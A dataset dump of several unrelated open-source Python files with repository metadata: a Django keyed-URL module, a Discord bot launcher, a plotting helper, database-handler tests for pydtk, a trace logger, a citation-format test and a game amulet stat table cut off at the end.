|
[
"BSD-3-Clause"
] | null | null | null |
keyed_urls/__init__.py
|
matthiask/django-keyed-urls
|
b195ffd24c1c259485744cc0c1b824f4dd867ac0
|
[
"BSD-3-Clause"
] | null | null | null |
keyed_urls/__init__.py
|
matthiask/django-keyed-urls
|
b195ffd24c1c259485744cc0c1b824f4dd867ac0
|
[
"BSD-3-Clause"
] | null | null | null |
VERSION = (0, 4, 1)
__version__ = '.'.join(map(str, VERSION))
_none_type = 0xc0ffee
_available_languages = None
class KeyDoesNotExist(Exception):
pass
def get_url(key, language=None, fail_silently=False):
global _available_languages
from django.conf import settings
from django.core.cache import cache
from django.utils.translation import get_language, override
from keyed_urls.models import KeyedURL
if _available_languages is None:
_available_languages = [row[0] for row in settings.LANGUAGES]
language = language if language is not None else get_language()
# Django 1.6 comes with trans_real.get_supported_language_variant;
# earlier versions do not. We are being fast and cheap here.
if language not in _available_languages:
language = language.split('-')[0]
cache_key = 'keyed_urls:%s:%s' % (key, language)
url = cache.get(cache_key)
if url is None:
try:
instance = KeyedURL.objects.get(key=key)
except KeyedURL.DoesNotExist:
# We can be smart here and initialize the cache for all
# languages.
cache.set_many(dict((
'keyed_urls:%s:%s' % (key, language),
_none_type,
) for language, _ in settings.LANGUAGES
))
url = None
else:
with override(language=language):
url = instance.url
cache.set(cache_key, _none_type if url is None else url, 120)
if url == _none_type:
url = None
if url is None and not fail_silently:
raise KeyDoesNotExist('No match found for key "%s".' % key)
return None if url == _none_type else url
def get_forwarding_url(key, language=None):
from django.core.urlresolvers import reverse
from django.utils.translation import override
if language is None:
return reverse('keyed_url_forward', kwargs={'key': key})
with override(language):
return reverse('keyed_url_forward', kwargs={'key': key})
| 28.901408
| 73
| 0.64961
|
794b052cd2fb4177cfdce8ce966300d6e262c4d0
| 1,808
|
py
|
Python
|
main.py
|
NCPlayz/EnterShikariBot
|
8a3a958c821bff175eaaf7194d39c8efd2f9da7a
|
[
"MIT"
] | null | null | null |
main.py
|
NCPlayz/EnterShikariBot
|
8a3a958c821bff175eaaf7194d39c8efd2f9da7a
|
[
"MIT"
] | null | null | null |
main.py
|
NCPlayz/EnterShikariBot
|
8a3a958c821bff175eaaf7194d39c8efd2f9da7a
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from discord.ext import commands
import discord
import os
import asyncio
class Bot(commands.Bot):
"""This is the class that initializes the bot."""
def __init__(self):
self.presence = discord.Game(name='The Spark | -help'
, url="https://www.twitch.tv/twitchpresents", type=1)
def get_prefix():
"""Fetches all known prefixes."""
return ["TS ",
"-"]
def get_game():
"""Fetches game presence."""
return self.presence
super().__init__(command_prefix=get_prefix(), game=get_game(), description="The Spark", pm_help=None,
help_attrs=dict(hidden=True))
startup_extensions = [x.stem for x in Path('cogs').glob('*.py')]
for extension in startup_extensions:
try:
self.load_extension(f'cogs.{extension}')
except Exception as e:
error = f'{extension}\n {type(e).__name__}: {e}'
print(f'Failed to load extension {error}')
def run(self, *args, **kwargs):
token = os.environ['TOKEN']
try:
self.loop.run_until_complete(super().start(token, *args, **kwargs))
except KeyboardInterrupt:
self.loop.run_until_complete(self.logout())
pending = asyncio.Task.all_tasks(loop=self.loop)
gathered = asyncio.gather(*pending, loop=self.loop)
try:
gathered.cancel()
self.loop.run_until_complete(gathered)
gathered.exception()
except:
pass
finally:
self.loop.close()
if __name__ == '__main__':
Bot().run()
| 33.481481
| 110
| 0.534845
|
794b055c33f0f4eaba2651d6b28baee4f0cec43f
| 620
|
py
|
Python
|
ginrex/ui/plot_exafs.py
|
San-WierPa/ginRex
|
25af3356e22af033f30b0a8a73139635466e4f44
|
[
"MIT"
] | 2
|
2021-11-22T22:00:05.000Z
|
2021-12-09T18:57:48.000Z
|
ginrex/ui/plot_exafs.py
|
San-WierPa/ginrex
|
25af3356e22af033f30b0a8a73139635466e4f44
|
[
"MIT"
] | null | null | null |
ginrex/ui/plot_exafs.py
|
San-WierPa/ginrex
|
25af3356e22af033f30b0a8a73139635466e4f44
|
[
"MIT"
] | null | null | null |
"""
The :mod:`~ginrex.plot_exafs` module gives the following utility functions:
* - :func:`absorption`
- Returns Matplotlib.pyplot figure.
"""
import matplotlib.pyplot as plt
import numpy as np
from numpy import log
def absorption(filename):
"""
Calculates the absorption according to PetraIII columns I1 and I0
and plots a simple figure.
Parameters
----------
filename: String
Returns
-------
Matplotlib.pyplot figure
"""
datatxt = np.genfromtxt(filename)
mu = -log(datatxt[:, 18] / datatxt[:, 17])
plt.plot(datatxt[:, 0], mu)
plt.show(block=False)
| 20.666667
| 75
| 0.643548
|
794b05c140f77c80a59ac829e5fadd7bc183dedd
| 23,165
|
py
|
Python
|
test/test_db.py
|
dataware-tools/pydtk
|
1da61fb8ca90de6c39a371a9b2b65f4473932991
|
[
"Apache-2.0"
] | 11
|
2020-10-09T01:29:18.000Z
|
2022-01-21T13:21:40.000Z
|
test/test_db.py
|
dataware-tools/pydtk
|
1da61fb8ca90de6c39a371a9b2b65f4473932991
|
[
"Apache-2.0"
] | 64
|
2020-10-20T04:55:22.000Z
|
2022-01-24T15:52:32.000Z
|
test/test_db.py
|
dataware-tools/pydtk
|
1da61fb8ca90de6c39a371a9b2b65f4473932991
|
[
"Apache-2.0"
] | 1
|
2021-07-30T04:52:38.000Z
|
2021-07-30T04:52:38.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright Toolkit Authors
from typing import Optional
from pydtk.db import V4DBHandler, V4MetaDBHandler, V4DatabaseIDDBHandler
import pytest
db_args = 'db_engine,db_host,db_username,db_password'
db_list = [
('tinydb', 'test/test_v4.json', None, None),
('tinymongo', 'test/test_v4', None, None),
('montydb', 'test/test_v4', None, None),
# ('mongodb', 'host', 'username', 'password')
]
default_db_parameter = db_list[0]
def _add_data_to_db(handler: V4DBHandler):
from pydtk.models import MetaDataModel
paths = [
'test/records/sample/data/records.bag.json',
'test/records/csv_model_test/data/test.csv.json',
'test/records/json_model_test/json_test.json.json',
'test/records/forecast_model_test/forecast_test.csv.json',
'test/records/annotation_model_test/annotation_test.csv.json'
]
# Load metadata and add to DB
record_ids = set()
for path in paths:
metadata = MetaDataModel()
metadata.load(path)
record_ids.add(metadata.data['record_id'])
handler.add_data(metadata.data)
# Get DF
df = handler.df
assert len(df) == len(handler) and len(df) > 0
# Save
handler.save()
def _load_data_from_db(handler: V4DBHandler):
assert handler.count_total > 0
assert len(handler) > 0
try:
for sample in handler:
assert 'contents' in sample.keys()
assert isinstance(sample['contents'], dict)
assert len(sample['contents'].keys()) == 1
except (EOFError, StopIteration):
pass
@pytest.mark.parametrize(db_args, db_list)
def test_create_db(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Create DB of records directory.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_add_data_to_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_load_db(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_load_data_from_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_load_database_id(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
handler.read()
assert isinstance(handler, V4DatabaseIDDBHandler)
assert len(handler.df) == 1
assert next(handler)['database_id'] == 'default'
@pytest.mark.parametrize(db_args, db_list)
def test_update_configs_db(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
try:
handler.config.update({'_df_name': 'aaa'})
handler.config['_df_name'] = ''
raise AssertionError
except KeyError:
pass
handler.config['columns'].append({'name': 'test', 'dtype': 'str'})
handler.save()
del handler
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
handler.read()
assert handler.config['columns'][-1]['name'] == 'test'
del handler.config['columns'][-1]
handler.save()
@pytest.mark.parametrize(db_args, db_list)
def test_delete_records(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Delete records from DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='record_id'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
assert len(handler) == handler.count_total
num_data = len(handler)
# Remove one record without saving
handler.remove_data(next(handler))
assert len(handler) == num_data - 1
handler.read()
assert len(handler) == num_data
# Remove all data and save
try:
for sample in handler:
handler.remove_data(sample)
num_data -= 1
assert len(handler) == num_data
except (EOFError, StopIteration):
pass
assert len(handler) == 0
handler.save()
# Rollback data
_add_data_to_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_delete_collection(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Delete a collection from DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
handler.read()
assert isinstance(handler, V4DatabaseIDDBHandler)
num_databases_original = len(handler)
database = next(handler)
handler.remove_data(database)
handler.save()
assert len(handler) == num_databases_original - 1
handler.read()
assert len(handler) == num_databases_original - 1
if db_engine not in ['tinydb', 'tinymongo']:
# Check if the corresponding table is deleted
meta_handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
assert isinstance(meta_handler, V4MetaDBHandler)
assert len(meta_handler) == 0
@pytest.mark.parametrize(db_args, db_list)
def test_create_db_with_env_var(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Create DB of records directory.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
import os
# Set environment variables
if db_engine is not None:
os.environ['PYDTK_META_DB_ENGINE'] = db_engine
if db_host is not None:
os.environ['PYDTK_META_DB_HOST'] = db_host
if db_username is not None:
os.environ['PYDTK_META_DB_USERNAME'] = db_username
if db_password is not None:
os.environ['PYDTK_META_DB_PASSWORD'] = db_password
handler = V4DBHandler(
db_class='meta',
base_dir_path='/opt/pydtk/test'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_add_data_to_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_load_db_with_env_var(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
import os
# Set environment variables
if db_engine is not None:
os.environ['PYDTK_META_DB_ENGINE'] = db_engine
if db_host is not None:
os.environ['PYDTK_META_DB_HOST'] = db_host
if db_username is not None:
os.environ['PYDTK_META_DB_USERNAME'] = db_username
if db_password is not None:
os.environ['PYDTK_META_DB_PASSWORD'] = db_password
handler = V4DBHandler(db_class='meta')
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_load_data_from_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_merge(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test merging dicts.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
data_1 = {
'record_id': 'aaa',
'string': 'test123',
'dict': {
'aaa': 'aaa'
},
'list': [
'aaa'
]
}
data_2 = {
'record_id': 'aaa',
'string': 'test123',
'dict': {
'bbb': 'bbb'
},
'list': [
'bbb'
]
}
data_merged = {
'record_id': 'aaa',
'string': 'test123',
'dict': {
'aaa': 'aaa',
'bbb': 'bbb'
},
'list': [
'aaa',
'bbb'
]
}
handler.add_data(data_1, strategy='merge')
handler.add_data(data_2, strategy='merge')
data = handler.data[0]
assert len(handler) == 1
assert all([set(data[key]) == set(data_merged[key]) for key in data_merged.keys()])
@pytest.mark.parametrize(db_args, list(filter(lambda d: d[0] in ['tinydb'], db_list)))
def test_search_tinydb(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Search on TinyDB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
from tinydb import where
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
handler.read(query=where('record_id') == 'test')
assert len(handler) > 0
handler.read(query=where('start_timestamp') < 1489728492.0)
assert len(handler) > 0
@pytest.mark.parametrize(
db_args,
list(filter(lambda d: d[0] in ['tinymongo', 'mongodb', 'montydb'], db_list))
)
def test_search_mongo(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Search on MongoDB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
# MongoDB-like query
handler.read(query={'record_id': 'test'})
assert len(handler) > 0
handler.read(query={'record_id': {'$regex': '016'}})
assert len(handler) > 0
handler.read(query={'record_id': {'$regex': '^016.*'}})
assert len(handler) > 0
handler.read(query={
'$and': [
{'record_id': {'$regex': '.*'}},
{'start_timestamp': {'$lt': 1489728492.0}}
]
})
assert len(handler) > 0
# Python-Query-Language (PQL)
handler.read(pql="record_id == 'test'")
assert len(handler) > 0
handler.read(pql="record_id == regex('test.*')")
assert len(handler) > 0
handler.read(query={'contents./points_concat_downsampled': {'$exists': True}})
assert len(handler) > 0
handler.read(pql='"contents./points_concat_downsampled" == exists(True)')
assert len(handler) > 0
handler.read(pql="start_timestamp > 1500000000.0")
assert len(handler) > 0
handler.read(
pql='start_timestamp > 1400000000.0 '
'and "contents./points_concat_downsampled" == exists(True)'
)
assert len(handler) > 0
@pytest.mark.parametrize(db_args, list(filter(lambda d: d[0] in ['mongodb'], db_list)))
def test_group_by_mongo(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Evaluate Group-by on MongoDB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
handler.read()
group_keys = ['database_id', 'record_id', 'content_type', 'data_type']
all = {k: [data[k] for data in handler.data] for k in group_keys}
for key in group_keys:
handler.read(group_by=key)
grouped = [data[key] for data in handler.data]
assert len(grouped) == len(set(all[key])), 'AssertionError: group_key: {}'.format(key)
@pytest.mark.parametrize(
db_args,
list(filter(lambda d: d[0] in ['mongodb', 'montydb'], db_list))
)
def test_limit_mongo(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for limit.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='file',
read_on_init=False
)
handler.read(limit=1)
assert len(handler) == 1
handler.read(limit=2)
assert len(handler) == 2
@pytest.mark.parametrize(db_args, db_list)
def test_add_columns(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Add columns to DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
assert isinstance(handler, V4MetaDBHandler)
data = {
'key-int': int(0),
'key-float': float(0.0),
'key-str': 'str',
'key-dict': {
'abc': 'def'
}
}
handler.add_data(data)
for key in ['key-int', 'key-float', 'key-str', 'key-dict']:
assert key in [c['name'] for c in handler.config['columns']]
assert next(filter(lambda c: c['name'] == key, handler.config['columns']))['dtype'] \
== type(data[key]).__name__ # noqa: E721
handler.save()
handler.read()
for key in ['key-int', 'key-float', 'key-str', 'key-dict']:
assert key in [c['name'] for c in handler.config['columns']]
assert next(filter(lambda c: c['name'] == key, handler.config['columns']))['dtype'] \
== type(data[key]).__name__ # noqa: E721
handler.remove_data(data)
handler.save()
@pytest.mark.parametrize(db_args, db_list)
def test_display_name(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for display_name in configs.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='path'
)
assert isinstance(handler, V4MetaDBHandler)
reserved_names = ['_id', '_uuid', '_creation_time']
names = [c for c in handler.columns if c not in reserved_names]
display_names = [c for c in handler.df.columns.tolist() if c not in reserved_names]
assert all([n in [c['name'] for c in handler.config['columns']] for n in names])
assert all([n in [c['display_name'] for c in handler.config['columns']] for n in display_names])
@pytest.mark.parametrize(db_args, db_list)
def test_read_with_offset(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for reading database with offset.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='path'
)
assert isinstance(handler, V4MetaDBHandler)
handler.read(offset=0)
assert handler.df.index[0] == 0
handler.read(offset=1)
assert handler.df.index[0] == 1
handler.read(offset=1, limit=1)
assert handler.df.index[0] == 1
@pytest.mark.parametrize(db_args, db_list)
def test_db_handler_dtype(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for checking data-types handled by DBHandler.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
from pydtk.db import DBHandler
handler = DBHandler(db_class='meta')
handler.add_data({
'record_id': 1,
'path': 'abc',
'contents': {},
'new_column_str': '',
'new_column_int': 1,
'new_column_float': 1.234,
'new_column_list': [],
'new_column_dict': {}
})
assert isinstance(handler.data[0]['record_id'], str)
assert isinstance(handler.data[0]['path'], str)
assert isinstance(handler.data[0]['contents'], dict)
assert isinstance(handler.data[0]['new_column_str'], str)
assert isinstance(handler.data[0]['new_column_int'], int)
assert isinstance(handler.data[0]['new_column_float'], float)
assert isinstance(handler.data[0]['new_column_list'], list)
assert isinstance(handler.data[0]['new_column_dict'], dict)
handler.save()
handler = DBHandler(db_class='meta')
handler.read(pql='"record_id" == regex(".*")')
assert len(handler) > 0
@pytest.mark.parametrize(
db_args, list(filter(lambda d: d[0] in ['mongodb', 'montydb'], db_list))
)
def test_remove_database_id(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test `drop_table` function."""
from pydtk.db import DBHandler
# Create a database with database-id 'pytest'
handler = DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
database_id='pytest'
)
_add_data_to_db(handler)
# Load database-id handler
handler = DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
handler.read()
assert len(list(filter(lambda x: x['database_id'] == 'pytest', handler.data))) > 0
# Remove database-id 'pytest' (in-memory)
database_info_to_remove = next(filter(lambda x: x['database_id'] == 'pytest', handler.data))
handler.remove_data(database_info_to_remove)
# Make sure that no resources are changed on the remote DB
_handler = DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
_handler.read()
assert len(list(filter(lambda x: x['database_id'] == 'pytest', _handler.data))) > 0
_metadata_handler = DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
database_id='pytest'
)
_metadata_handler.read()
assert len(_handler) > 0
# Reflect the removal of database-id 'pytest' to the remote DB
handler.save()
# Confirm that the resources are removed on the remote DB
_handler.read()
assert len(list(filter(lambda x: x['database_id'] == 'pytest', _handler.data))) == 0
_metadata_handler.read()
assert len(_metadata_handler) == 0
if __name__ == '__main__':
test_create_db(*default_db_parameter)
test_load_db(*default_db_parameter)
test_create_db_with_env_var(*default_db_parameter)
test_load_db_with_env_var(*default_db_parameter)
test_merge(*default_db_parameter)
test_search_tinydb()
test_search_mongo(*next(filter(lambda d: d[0] in ['tinymongo'], db_list)))
| 27.093567
| 100
| 0.618347
|
794b06e54025ab6e2d05c25eb7a26179f5454026
| 1,783
|
py
|
Python
|
python/itypes/log/trace_logger.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
python/itypes/log/trace_logger.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
python/itypes/log/trace_logger.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
import inspect
from itypes import addr
TRACE = -1
DEBUG = 0
INFO = 1
WARNING = 2
ERROR = 3
log_level = INFO
def set_trace_level(level):
global log_level
if isinstance(level, str):
level = str_to_level(level)
log_level = level
def str_to_level(str):
if str == "TRACE": return TRACE
if str == "DEBUG": return DEBUG
if str == "INFO": return INFO
if str == "WARNING": return WARNING
if str == "ERROR": return ERROR
raise KeyError(str)
def level_to_str(level):
if level == TRACE: return "TRACE"
if level == DEBUG: return "DEBUG"
if level == INFO: return "INFO"
if level == WARNING: return "WARNING"
if level == ERROR: return "ERROR"
return "(unknown)"
class TraceLogger:
def __init__(self):
info = inspect.stack()[1]
self._container = info.frame.f_locals["__class__"]
self._module_name = self._container.__module__
self._class_name = self._container.__name__
def _message(self, level, message):
global log_level
if level < log_level:
return
info = inspect.stack()[2]
object = info.frame.f_locals["self"]
function_name = info.function
str = ""
str += f"[{level_to_str(level):>7s}] {self._module_name:40s} {self._class_name:25s} {addr(object):14s} {function_name+'()':30s}: {message}"
str += "\n"
sys.stdout.write(str)
sys.stdout.flush()
def info(self, msg):
self._message(INFO, msg)
def debug(self, msg):
self._message(DEBUG, msg)
def trace(self, msg):
self._message(TRACE, msg)
def error(self, msg):
self._message(ERROR, msg)
def warning(self, msg):
self._message(WARNING, msg)
| 24.094595
| 147
| 0.614694
|
794b07dbb77fee62e63f2d12b108154ddc1a8fda
| 1,742
|
py
|
Python
|
test/1.1.0/08/test_1_1_0__08_ris_object.py
|
zmoon/cff-converter-python
|
ebf0b5e44d67f8beaa1cd13a0d0393ea04c6058d
|
[
"Apache-2.0"
] | 40
|
2018-06-13T21:38:35.000Z
|
2022-03-19T18:34:37.000Z
|
test/1.1.0/08/test_1_1_0__08_ris_object.py
|
zmoon/cff-converter-python
|
ebf0b5e44d67f8beaa1cd13a0d0393ea04c6058d
|
[
"Apache-2.0"
] | 135
|
2018-03-20T09:35:39.000Z
|
2022-03-16T14:57:08.000Z
|
test/1.1.0/08/test_1_1_0__08_ris_object.py
|
zmoon/cff-converter-python
|
ebf0b5e44d67f8beaa1cd13a0d0393ea04c6058d
|
[
"Apache-2.0"
] | 14
|
2018-06-12T20:17:25.000Z
|
2022-02-02T13:58:58.000Z
|
import os
import pytest
from test.contracts.ris_object import Contract
from cffconvert.behavior_1_1_x.ris_object import RisObject
from cffconvert import Citation
@pytest.fixture(scope="module")
def ris_object():
fixture = os.path.join(os.path.dirname(__file__), "CITATION.cff")
with open(fixture, "rt", encoding="utf-8") as f:
cffstr = f.read()
citation = Citation(cffstr)
return RisObject(citation.cffobj, initialize_empty=True)
class TestRisObject(Contract):
def test_abstract(self, ris_object):
assert ris_object.add_abstract().abstract is None
def test_as_string(self, ris_object):
actual_ris = ris_object.add_all().as_string()
fixture = os.path.join(os.path.dirname(__file__), "ris.txt")
with open(fixture, "rt", encoding="utf-8") as f:
expected_ris = f.read()
assert actual_ris == expected_ris
def test_author(self, ris_object):
assert ris_object.add_author().author == 'AU - Van Zandt, Steven\nAU - van Zandt, Steven\n'
def test_check_cffobj(self, ris_object):
ris_object.check_cffobj()
# doesn't need an assert
def test_date(self, ris_object):
assert ris_object.add_date().date == 'DA - 2018-01-16\n'
def test_doi(self, ris_object):
assert ris_object.add_doi().doi is None
def test_keywords(self, ris_object):
assert ris_object.add_keywords().keywords is None
def test_title(self, ris_object):
assert ris_object.add_title().title == 'TI - cff-converter-python\n'
def test_url(self, ris_object):
assert ris_object.add_url().url is None
def test_year(self, ris_object):
assert ris_object.add_year().year == 'PY - 2018\n'
| 32.867925
| 101
| 0.680827
|
794b082fb05e1f17061f33978e6746f059f48226
| 8,930
|
py
|
Python
|
slot/a/all.py
|
pfleg/dl
|
0566bd5cac32feea7dfd082b199a44b05e8e1e04
|
[
"Apache-2.0"
] | null | null | null |
slot/a/all.py
|
pfleg/dl
|
0566bd5cac32feea7dfd082b199a44b05e8e1e04
|
[
"Apache-2.0"
] | null | null | null |
slot/a/all.py
|
pfleg/dl
|
0566bd5cac32feea7dfd082b199a44b05e8e1e04
|
[
"Apache-2.0"
] | null | null | null |
from slot.a import Amulet, Conf
class Plunder_Pals(Amulet): #Plunder Pals or Hitting the Books
att = 54
a = [('s',0.30)]
PP = Plunder_Pals
class Resounding_Rendition(Amulet):
att = 64
a = [('s',0.30),
('cc',0.08,'hp70')]
RR = Resounding_Rendition
class Crystalian_Envoy(Amulet):
att = 57
a = [('a',0.13,'hp70')]
CE = Crystalian_Envoy
class Bonds_Between_Worlds(Amulet):
att = 54
a = [('a',0.13,'hp70'),
('prep',25)]
Bonds = Bonds_Between_Worlds
BBW = Bonds_Between_Worlds
class Levins_Champion(Amulet):
att = 64
a = [('cd',0.15),
('cc',0.10,'hp70')]
LC = Levins_Champion
class Valiant_Crown(Amulet):
att = 65
a = [('s',0.30),
('bc',0.10)]
VC = Valiant_Crown
class Tough_Love(Amulet):
att = 65
a = [('s',0.25),
('lo',0.50)]
TL = Tough_Love
class Flash_of_Genius(Amulet): # Flash of Genius
att = 57
a = [('a',0.20,'hit15')]
FG = Flash_of_Genius
FoG = Flash_of_Genius
class Fresh_Perspective(Amulet):
att = 52
a = [('fs',0.40),
('s',0.20)]
FP = Fresh_Perspective
#class Together_We_Stand(Amulet):
# att = 52
# a = [('sts',0.05),
# ('s',0.20)]
class FirstRate_Hospitality(Amulet):
att = 55
a = [('a',0.08,'hp70'),
('bc',0.10)]
FRH = FirstRate_Hospitality
class The_Bustling_Hut(Amulet):
att = 50
a = [('bc',0.08), ('sp',0.07,'light')]
class Jewels_of_the_Sun(Amulet):
att = 64
a = [('sp',0.08),
('a',0.10,'hp70')]
JotS = Jewels_of_the_Sun
class United_by_One_Vision(Amulet):
att = 54
a = [('sp',0.08),
('a',0.13,'hp70')]
class Heralds_of_Hinomoto(Amulet):
att = 64
a = [('s',0.30),
('sp',0.06)]
HoH = Heralds_of_Hinomoto
HH = Heralds_of_Hinomoto
class One_with_the_Shadows(Amulet):
att = 51
a = [('cc',0.06),
('bk',0.20)]
class Flower_in_the_Fray(Amulet):
att = 52
a = [('cd',0.15),
('s',0.20)]
FitF = Flower_in_the_Fray
class The_Prince_of_Dragonyule(Amulet):
att = 63
a = [('cd',0.20), ('cc',0.12,'water_hit15')]
class Evening_of_Luxury(Amulet):
att = 65
a = [('a',0.15,'hp100'),
('cd',0.15)]
EoL = Evening_of_Luxury
class Seaside_Princess(Amulet):
att = 65
a = [('a',0.15,'hp100'),
('cd',0.22,'hp100')]
SSP = Seaside_Princess
class The_Chocolatiers(Amulet):
att = 62
